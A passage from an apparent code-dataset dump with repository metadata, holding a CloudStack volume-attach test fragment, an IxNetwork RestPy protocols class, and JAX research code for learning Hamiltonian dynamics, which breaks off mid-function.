self.debug("Step 11: Enable storage pool: % s " % storage_1)
self.disabled_list.remove(storage_1)
except Exception as e:
self.fail("Step 11: Couldn't enable storage % s" % storage_1)
# Step 12: Repeat attach volume - should succeed
self.virtual_machine_1.attach_volume(self.userapiclient, self.volume_1)
self.debug("Step 12: Trying to attach volume")
list_volume = Volume.list(self.userapiclient, id=self.volume_1.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_1.id,
'Step 12: Check if volume state (attached) is reflected')
self.debug(
'Step 12: volume id:%s successfully attached to vm id%s' %
(self.volume_1.id, self.virtual_machine_1.id))
| 43.682686
| 127
| 0.555778
|
795004fca0e8add873abd4312b26549b1dcabfdd
| 15,471
|
py
|
Python
|
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
RestPy/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/protocols.py
|
ralfjon/IxNetwork
|
c0c834fbc465af69c12fd6b7cee4628baba7fff1
|
[
"MIT"
] | null | null | null |
# Copyright 1997 - 2018 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Protocols(Base):
"""The Protocols class encapsulates a user managed protocols node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Protocols property from a parent instance.
The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
The internal properties list can be managed by the user by using the add and remove methods.
"""
_SDM_NAME = 'protocols'
def __init__(self, parent):
super(Protocols, self).__init__(parent)
@property
def Arp(self):
"""An instance of the Arp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.arp.arp.Arp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.arp.arp import Arp
return Arp(self)
@property
def Bfd(self):
"""An instance of the Bfd class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bfd.bfd.Bfd)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bfd.bfd import Bfd
return Bfd(self)._select()
@property
def Bgp(self):
"""An instance of the Bgp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bgp.bgp.Bgp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.bgp.bgp import Bgp
return Bgp(self)._select()
@property
def Cfm(self):
"""An instance of the Cfm class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.cfm.cfm.Cfm)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.cfm.cfm import Cfm
return Cfm(self)._select()
@property
def Eigrp(self):
"""An instance of the Eigrp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.eigrp.eigrp.Eigrp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.eigrp.eigrp import Eigrp
return Eigrp(self)._select()
@property
def Elmi(self):
"""An instance of the Elmi class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.elmi.elmi.Elmi)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.elmi.elmi import Elmi
return Elmi(self)._select()
@property
def Igmp(self):
"""An instance of the Igmp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.igmp.igmp.Igmp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.igmp.igmp import Igmp
return Igmp(self)._select()
@property
def Isis(self):
"""An instance of the Isis class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.isis.isis.Isis)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.isis.isis import Isis
return Isis(self)._select()
@property
def Lacp(self):
"""An instance of the Lacp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.lacp.Lacp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lacp.lacp import Lacp
return Lacp(self)._select()
@property
def Ldp(self):
"""An instance of the Ldp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ldp.ldp.Ldp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ldp.ldp import Ldp
return Ldp(self)._select()
@property
def LinkOam(self):
"""An instance of the LinkOam class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.linkoam.linkoam.LinkOam)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.linkoam.linkoam import LinkOam
return LinkOam(self)._select()
@property
def Lisp(self):
"""An instance of the Lisp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lisp.lisp.Lisp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.lisp.lisp import Lisp
return Lisp(self)._select()
@property
def Mld(self):
"""An instance of the Mld class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mld.mld.Mld)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mld.mld import Mld
return Mld(self)._select()
@property
def MplsOam(self):
"""An instance of the MplsOam class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplsoam.mplsoam.MplsOam)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplsoam.mplsoam import MplsOam
return MplsOam(self)._select()
@property
def MplsTp(self):
"""An instance of the MplsTp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplstp.mplstp.MplsTp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.mplstp.mplstp import MplsTp
return MplsTp(self)._select()
@property
def OpenFlow(self):
"""An instance of the OpenFlow class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.openflow.OpenFlow)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.openflow.openflow import OpenFlow
return OpenFlow(self)._select()
@property
def Ospf(self):
"""An instance of the Ospf class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospf.Ospf)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospf import Ospf
return Ospf(self)._select()
@property
def OspfV3(self):
"""An instance of the OspfV3 class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospfv3.OspfV3)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ospf.ospfv3 import OspfV3
return OspfV3(self)._select()
@property
def Pimsm(self):
"""An instance of the Pimsm class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.pimsm.pimsm.Pimsm)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.pimsm.pimsm import Pimsm
return Pimsm(self)._select()
@property
def Ping(self):
"""An instance of the Ping class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ping.ping.Ping)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ping.ping import Ping
return Ping(self)
@property
def Rip(self):
"""An instance of the Rip class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rip.rip.Rip)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rip.rip import Rip
return Rip(self)._select()
@property
def Ripng(self):
"""An instance of the Ripng class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ripng.ripng.Ripng)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.ripng.ripng import Ripng
return Ripng(self)._select()
@property
def Rsvp(self):
"""An instance of the Rsvp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rsvp.rsvp.Rsvp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.rsvp.rsvp import Rsvp
return Rsvp(self)._select()
@property
def Static(self):
"""An instance of the Static class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.static.static.Static)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.static.static import Static
return Static(self)._select()
@property
def Stp(self):
"""An instance of the Stp class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.stp.stp.Stp)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.stp.stp import Stp
return Stp(self)._select()
@property
def ProtocolMaxNodeCount(self):
"""Shows maximum number of node.
Returns:
number
"""
return self._get_attribute('protocolMaxNodeCount')
def add(self):
"""Adds a new protocols node on the server and retrieves it in this instance.
Returns:
self: This instance with all currently retrieved protocols data using find and the newly added protocols data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the protocols data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ProtocolMaxNodeCount=None):
"""Finds and retrieves protocols data from the server.
All named parameters support regex and can be used to selectively retrieve protocols data from the server.
By default the find method takes no parameters and will retrieve all protocols data from the server.
Args:
ProtocolMaxNodeCount (number): Shows maximum number of node.
Returns:
self: This instance with matching protocols data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of protocols data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the protocols data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| 34.45657
| 152
| 0.753927
|
795006074c393a90f382bb58a702e55db96ff292
| 17,303
|
py
|
Python
|
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | 1
|
2021-07-06T21:07:57.000Z
|
2021-07-06T21:07:57.000Z
|
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | null | null | null |
experiments/trainer/hamiltonian_dynamics.py
|
felipeescallon/equivariant-MLP
|
1542fcbb747292ae1c529d551595d919087c617d
|
[
"MIT"
] | null | null | null |
import os
import jax
import jax.numpy as jnp
from jax import grad, jit, vmap, jacfwd, jvp, vjp
from jax import random
from jax.experimental.ode import odeint
import numpy as np
import objax
import torch
import torch.nn as nn
from torch.utils.data import Dataset
from emlp.groups import SO2eR3,O2eR3,DkeR3,Trivial
from emlp.reps import T,Scalar
from oil.utils.utils import Named, export
from oil.tuning.configGenerator import flatten_dict
from .classifier import Regressor,Classifier
#from emlp_jax.model_trainer import RegressorPlus
from functools import partial
from itertools import islice
def unpack(z):
D = jnp.shape(z)[-1]
assert D % 2 == 0
d = D//2
q, p_or_v = z[..., :d], z[..., d:]
return q, p_or_v
def pack(q, p_or_v):
return jnp.concatenate([q, p_or_v], axis=-1)
def symplectic_form(z):
q, p = unpack(z)
return pack(p, -q)
def hamiltonian_dynamics(hamiltonian, z,t):
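# Hamilton's equations in vector form: dz/dt = J * grad H(z) for z = (q, p),
# where J is the canonical symplectic matrix; symplectic_form applies J,
# mapping (dH/dq, dH/dp) to (dH/dp, -dH/dq).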
grad_h = grad(hamiltonian)
gh = grad_h(z)
return symplectic_form(gh)
def HamiltonianFlow(H,z0,T):
dynamics = lambda z,t: hamiltonian_dynamics(H,z,t)
return odeint(dynamics, z0, T, rtol=1e-4, atol=1e-4)#.transpose((1,0,2))
def BHamiltonianFlow(H,z0,T,tol=1e-4):
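# Batched flow: vmap the dynamics over a batch of initial states z0 of shape (bs, D);
# odeint returns (T, bs, D), which is transposed to (bs, T, D).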
dynamics = jit(vmap(jit(partial(hamiltonian_dynamics,H)),(0,None)))
return odeint(dynamics, z0, T, rtol=tol).transpose((1,0,2))
def BOdeFlow(dynamics,z0,T,tol=1e-4):
dynamics = jit(vmap(jit(dynamics),(0,None)))
return odeint(dynamics, z0, T, rtol=tol).transpose((1,0,2))
#BHamiltonianFlow = jit(vmap(HamiltonianFlow,(None,0,None)),static_argnums=(0,))
class HamiltonianDataset(Dataset):
def __init__(self,n_systems=100,chunk_len=5,dt=0.2,integration_time=30,regen=False):
super().__init__()
root_dir = os.path.expanduser(f"~/datasets/ODEDynamics/{self.__class__}/")
filename = os.path.join(root_dir, f"trajectories_{n_systems}_{chunk_len}_{dt}_{integration_time}.pz")
if os.path.exists(filename) and not regen:
Zs = torch.load(filename)
else:
zs = self.generate_trajectory_data(n_systems, dt, integration_time)
Zs = np.asarray(self.chunk_training_data(zs, chunk_len))
os.makedirs(root_dir, exist_ok=True)
torch.save(Zs, filename)
self.Zs = Zs
self.T = np.asarray(jnp.arange(0, chunk_len*dt, dt))
self.T_long = np.asarray(jnp.arange(0,integration_time,dt))
def __len__(self):
return self.Zs.shape[0]
def __getitem__(self, i):
return (self.Zs[i, 0], self.T), self.Zs[i]
def integrate(self,z0s,ts):
return HamiltonianFlow(self.H,z0s, ts)
def generate_trajectory_data(self, n_systems, dt, integration_time, bs=100):
""" Returns ts: (n_systems, traj_len) zs: (n_systems, traj_len, z_dim) """
n_gen = 0; bs = min(bs, n_systems)
t_batches, z_batches = [], []
while n_gen < n_systems:
z0s = self.sample_initial_conditions(bs)
ts = jnp.arange(0, integration_time, dt)
new_zs = BHamiltonianFlow(self.H,z0s, ts)
z_batches.append(new_zs)
n_gen += bs
zs = jnp.concatenate(z_batches, axis=0)[:n_systems]
return zs
def chunk_training_data(self, zs, chunk_len):
batch_size, traj_len, *z_dim = zs.shape
n_chunks = traj_len // chunk_len
chunk_idx = np.random.randint(0, n_chunks, (batch_size,))
chunked_zs = np.stack(np.split(zs,n_chunks, axis=1))
chosen_zs = chunked_zs[chunk_idx, np.arange(batch_size)]
return chosen_zs
def H(self,z):
raise NotImplementedError
def sample_initial_conditions(self,bs):
raise NotImplementedError
def animate(self, zt=None):
if zt is None:
zt = np.asarray(self.integrate(self.sample_initial_conditions(10)[0],self.T_long))
# bs, T, 2nd
if len(zt.shape) == 3:
j = np.random.randint(zt.shape[0])
zt = zt[j]
xt,pt = unpack(zt)
xt = xt.reshape((xt.shape[0],-1,3))
anim = self.animator(xt)
return anim.animate()
class SHO(HamiltonianDataset):
def H(self,z):
ke = (z[...,1]**2).sum()/2
pe = (z[...,0]**2).sum()/2
return ke+pe
def sample_initial_conditions(self,bs):
return np.random.randn(bs,2)
class DoubleSpringPendulum(HamiltonianDataset):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
self.rep_in = 4*T(1)#Vector
self.rep_out = T(0)#Scalar
self.symmetry = O2eR3()
self.stats = (0,1,0,1)
def H(self,z):
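# Hamiltonian of two masses connected in series by springs under gravity:
# z packs positions (x1, x2) and momenta (p1, p2); kinetic energy p_i^2/(2*m_i)
# plus spring potentials and gravitational potential m_i*g*z_i.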
g=1
m1,m2,k1,k2,l1,l2 = 1,1,1,1,1,1
x,p = unpack(z)
p1,p2 = unpack(p)
x1,x2 = unpack(x)
ke = .5*(p1**2).sum(-1)/m1 + .5*(p2**2).sum(-1)/m2
pe = .5*k1*(jnp.sqrt((x1**2).sum(-1))-l1)**2
pe += k2*(jnp.sqrt(((x1-x2)**2).sum(-1))-l2)**2
pe += m1*g*x1[...,2]+m2*g*x2[...,2]
return (ke + pe).sum()
def sample_initial_conditions(self,bs):
x1 = np.array([0,0,-1.5]) +.2*np.random.randn(bs,3)
x2= np.array([0,0,-3.]) +.2*np.random.randn(bs,3)
p = .4*np.random.randn(bs,6)
z0 = np.concatenate([x1,x2,p],axis=-1)
return z0
@property
def animator(self):
return CoupledPendulumAnimation
class IntegratedDynamicsTrainer(Regressor):
def __init__(self,model,*args,**kwargs):
super().__init__(model,*args,**kwargs)
self.loss = objax.Jit(self.loss,model.vars())
#self.model = objax.Jit(self.model)
self.gradvals = objax.Jit(objax.GradValues(self.loss,model.vars()))#objax.Jit(objax.GradValues(fastloss,model.vars()),model.vars())
#self.model.predict = objax.Jit(objax.ForceArgs(model.__call__,training=False),model.vars())
def loss(self, minibatch):
""" Standard cross-entropy loss """
(z0, ts), true_zs = minibatch
pred_zs = BHamiltonianFlow(self.model,z0,ts[0])
return jnp.mean((pred_zs - true_zs)**2)
def metrics(self, loader):
mse = lambda mb: np.asarray(self.loss(mb))
return {"MSE": self.evalAverageMetrics(loader, mse)}
def logStuff(self, step, minibatch=None):
loader = self.dataloaders['test']
metrics = {'test_Rollout': np.exp(self.evalAverageMetrics(loader,partial(log_rollout_error,loader.dataset,self.model)))}
self.logger.add_scalars('metrics', metrics, step)
super().logStuff(step,minibatch)
class IntegratedODETrainer(Regressor):
def __init__(self,model,*args,**kwargs):
super().__init__(model,*args,**kwargs)
self.loss = objax.Jit(self.loss,model.vars())
#self.model = objax.Jit(self.model)
self.gradvals = objax.Jit(objax.GradValues(self.loss,model.vars()))#objax.Jit(objax.GradValues(fastloss,model.vars()),model.vars())
#self.model.predict = objax.Jit(objax.ForceArgs(model.__call__,training=False),model.vars())
def loss(self, minibatch):
""" Standard cross-entropy loss """
(z0, ts), true_zs = minibatch
pred_zs = BOdeFlow(self.model,z0,ts[0])
return jnp.mean((pred_zs - true_zs)**2)
def metrics(self, loader):
mse = lambda mb: np.asarray(self.loss(mb))
return {"MSE": self.evalAverageMetrics(loader, mse)}
def logStuff(self, step, minibatch=None):
loader = self.dataloaders['test']
metrics = {'test_Rollout': np.exp(self.evalAverageMetrics(loader,partial(log_rollout_error_ode,loader.dataset,self.model)))}
self.logger.add_scalars('metrics', metrics, step)
super().logStuff(step,minibatch)
def rel_err(a,b):
return jnp.sqrt(((a-b)**2).mean())/(jnp.sqrt((a**2).mean())+jnp.sqrt((b**2).mean()))#
def log_rollout_error(ds,model,minibatch):
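# Roll out the learned Hamiltonian and the ground-truth Hamiltonian from the same
# initial states and return the log of the geometric mean relative error over the trajectory.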
(z0, _), _ = minibatch
pred_zs = BHamiltonianFlow(model,z0,ds.T_long)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long)
errs = vmap(vmap(rel_err))(pred_zs,gt_zs) # (bs,T,)
clamped_errs = jax.lax.clamp(1e-7,errs,np.inf)
log_geo_mean = jnp.log(clamped_errs).mean()
return log_geo_mean
def pred_and_gt(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BHamiltonianFlow(model,z0,ds.T_long,tol=2e-6)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long,tol=2e-6)
return np.stack([pred_zs,gt_zs],axis=-1)
def log_rollout_error_ode(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BOdeFlow(model,z0,ds.T_long)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long)
errs = vmap(vmap(rel_err))(pred_zs,gt_zs) # (bs,T,)
clamped_errs = jax.lax.clamp(1e-7,errs,np.inf)
log_geo_mean = jnp.log(clamped_errs).mean()
return log_geo_mean
def pred_and_gt_ode(ds,model,minibatch):
(z0, _), _ = minibatch
pred_zs = BOdeFlow(model,z0,ds.T_long,tol=2e-6)
gt_zs = BHamiltonianFlow(ds.H,z0,ds.T_long,tol=2e-6)
return np.stack([pred_zs,gt_zs],axis=-1)
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.animation as animation
import numpy as np
class Animation(object):
def __init__(self, qt,lims=None,traj_lw=1,figkwargs={}):
""" [qt (T,n,d)"""
self.qt = qt
T,n,d = qt.shape
assert d in (2,3), "too many dimensions for animation"
self.fig = plt.figure(**figkwargs)
self.ax = self.fig.add_axes([0, 0, 1, 1],projection='3d') if d==3 else self.fig.add_axes([0, 0, 1, 1])
#self.ax.axis('equal')
xyzmin = self.qt.min(0).min(0)#.min(dim=0)[0].min(dim=0)[0]
xyzmax = self.qt.max(0).max(0)#.max(dim=0)[0].max(dim=0)[0]
delta = xyzmax-xyzmin
lower = xyzmin-.1*delta; upper = xyzmax+.1*delta
if lims is None:
lims = (min(lower),max(upper)),(min(lower),max(upper)),(min(lower),max(upper))
self.ax.set_xlim(lims[0])
self.ax.set_ylim(lims[1])
if d==3: self.ax.set_zlim(lims[2])
if d!=3: self.ax.set_aspect("equal")
#elf.ax.auto_scale_xyz()
empty = d*[[]]
self.colors = np.random.choice([f"C{i}" for i in range(10)],size=n,replace=False)
self.objects = {
'pts':sum([self.ax.plot(*empty, "o", ms=6,color=self.colors[i]) for i in range(n)], []),
'traj_lines':sum([self.ax.plot(*empty, "-",color=self.colors[i],lw=traj_lw) for i in range(n)], []),
}
def init(self):
empty = 2*[[]]
for obj in self.objects.values():
for elem in obj:
elem.set_data(*empty)
#if self.qt.shape[-1]==3: elem.set_3d_properties([])
return sum(self.objects.values(),[])
def update(self, i=0):
T,n,d = self.qt.shape
trail_len = 150
for j in range(n):
# trails
xyz = self.qt[max(i - trail_len,0): i + 1,j,:]
#chunks = xyz.shape[0]//10
#xyz_chunks = torch.chunk(xyz,chunks)
#for i,xyz in enumerate(xyz_chunks):
self.objects['traj_lines'][j].set_data(*xyz[...,:2].T)
if d==3: self.objects['traj_lines'][j].set_3d_properties(xyz[...,2].T)
self.objects['pts'][j].set_data(*xyz[-1:,...,:2].T)
if d==3: self.objects['pts'][j].set_3d_properties(xyz[-1:,...,2].T)
#self.fig.canvas.draw()
return sum(self.objects.values(),[])
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[0],
interval=33,init_func=self.init,blit=True).to_html5_video()
class PendulumAnimation(Animation):
def __init__(self, qt,*args,**kwargs):
super().__init__(qt,*args,**kwargs)
empty = self.qt.shape[-1] * [[]]
self.objects["pts"] = sum([self.ax.plot(*empty, "o", ms=10,c=self.colors[i]) for i in range(self.qt.shape[1])], [])
def update(self, i=0):
return super().update(i)
def helix(Ns=1000,radius=.05,turns=25):
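# Build a helical spring polyline along z in [0, 1]; the first and last 10% of the
# curve are flattened onto the axis to form straight attachment ends.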
t = np.linspace(0,1,Ns)
xyz = np.zeros((Ns,3))
xyz[:,0] = np.cos(2*np.pi*Ns*t*turns)*radius
xyz[:,1] = np.sin(2*np.pi*Ns*t*turns)*radius
xyz[:,2] = t
xyz[:,:2][(t>.9)|(t<.1)]=0
return xyz
def align2ref(refs,vecs):
""" inputs [refs (n,3), vecs (N,3)]
outputs [aligned (n,N,3)]
assumes vecs are pointing along z axis"""
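# Rotates the z-axis onto each reference direction via Rodrigues' rotation formula
# R = I + A + A^2/(1 + cos(theta)), with A the cross-product matrix of (z_hat x v),
# then stretches the z-extent of the aligned vectors by the length of each reference.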
n,_ = refs.shape
N,_ = vecs.shape
norm = np.sqrt((refs**2).sum(-1))
v = refs/norm[:,None]
A = np.zeros((n,3,3))
A[:,:,2] += v
A[:,2,:] -= v
M = (np.eye(3)+A+(A@A)/(1+v[:,2,None,None]))
scaled_vecs = vecs[None]+0*norm[:,None,None] #broadcast to right shape
scaled_vecs[:,:,2] *= norm[:,None]#[:,None,None]
return (M[:,None]@scaled_vecs[...,None]).squeeze(-1)
class CoupledPendulumAnimation(PendulumAnimation):
def __init__(self, *args, spring_lw=.6,spring_r=.2,**kwargs):
super().__init__(*args, **kwargs)
empty = self.qt.shape[-1]*[[]]
self.objects["springs"] = self.ax.plot(*empty,c='k',lw=spring_lw)#
#self.objects["springs"] = sum([self.ax.plot(*empty,c='k',lw=2) for _ in range(self.n-1)],[])
self.helix = helix(200,radius=spring_r,turns=10)
def update(self,i=0):
qt_padded = np.concatenate([0*self.qt[i,:1],self.qt[i,:]],axis=0)
diffs = qt_padded[1:]-qt_padded[:-1]
x,y,z = (align2ref(diffs,self.helix)+qt_padded[:-1][:,None]).reshape(-1,3).T
self.objects['springs'][0].set_data(x,y)
self.objects['springs'][0].set_3d_properties(z)
return super().update(i)
from collections.abc import Iterable
@export
class hnn_trial(object):
""" Assumes trainer is an object of type Trainer, trains for num_epochs which may be an
integer or an iterable containing intermediate points at which to save.
Pulls out special (resume, save, early_stop_metric, local_rank) args from the cfg """
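# Example usage (hypothetical config values; the actual keys depend on make_trainer):
#   trial = hnn_trial(make_trainer)
#   cfg, outcome = trial({'num_epochs': 100, 'network': 'EMLP',
#                         'net_config': {'group': 'O2eR3'},
#                         'trainer_config': {}}, i=0)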
def __init__(self,make_trainer,strict=True):
self.make_trainer = make_trainer
self.strict=strict
def __call__(self,cfg,i=None):
try:
cfg.pop('local_rank',None) #TODO: properly handle distributed
resume = cfg.pop('resume',False)
save = cfg.pop('save',False)
if i is not None:
orig_suffix = cfg.setdefault('trainer_config',{}).get('log_suffix','')
cfg['trainer_config']['log_suffix'] = os.path.join(orig_suffix,f'trial{i}/')
trainer = self.make_trainer(**cfg)
trainer.logger.add_scalars('config',flatten_dict(cfg))
epochs = cfg['num_epochs'] if isinstance(cfg['num_epochs'],Iterable) else [cfg['num_epochs']]
if resume: trainer.load_checkpoint(None if resume==True else resume)
epochs = [e for e in epochs if e>trainer.epoch]
for epoch in epochs:
trainer.train_to(epoch)
if save: cfg['saved_at']=trainer.save_checkpoint()
outcome = trainer.ckpt['outcome']
trajectories = []
for mb in trainer.dataloaders['test']:
trajectories.append(pred_and_gt(trainer.dataloaders['test'].dataset,trainer.model,mb))
torch.save(np.concatenate(trajectories),f"./{cfg['network']}_{cfg['net_config']['group']}_{i}.t")
except Exception as e:
if self.strict: raise
outcome = e
del trainer
return cfg, outcome
@export
class ode_trial(object):
""" Assumes trainer is an object of type Trainer, trains for num_epochs which may be an
integer or an iterable containing intermediate points at which to save.
Pulls out special (resume, save, early_stop_metric, local_rank) args from the cfg """
def __init__(self,make_trainer,strict=True):
self.make_trainer = make_trainer
self.strict=strict
def __call__(self,cfg,i=None):
try:
cfg.pop('local_rank',None) #TODO: properly handle distributed
resume = cfg.pop('resume',False)
save = cfg.pop('save',False)
if i is not None:
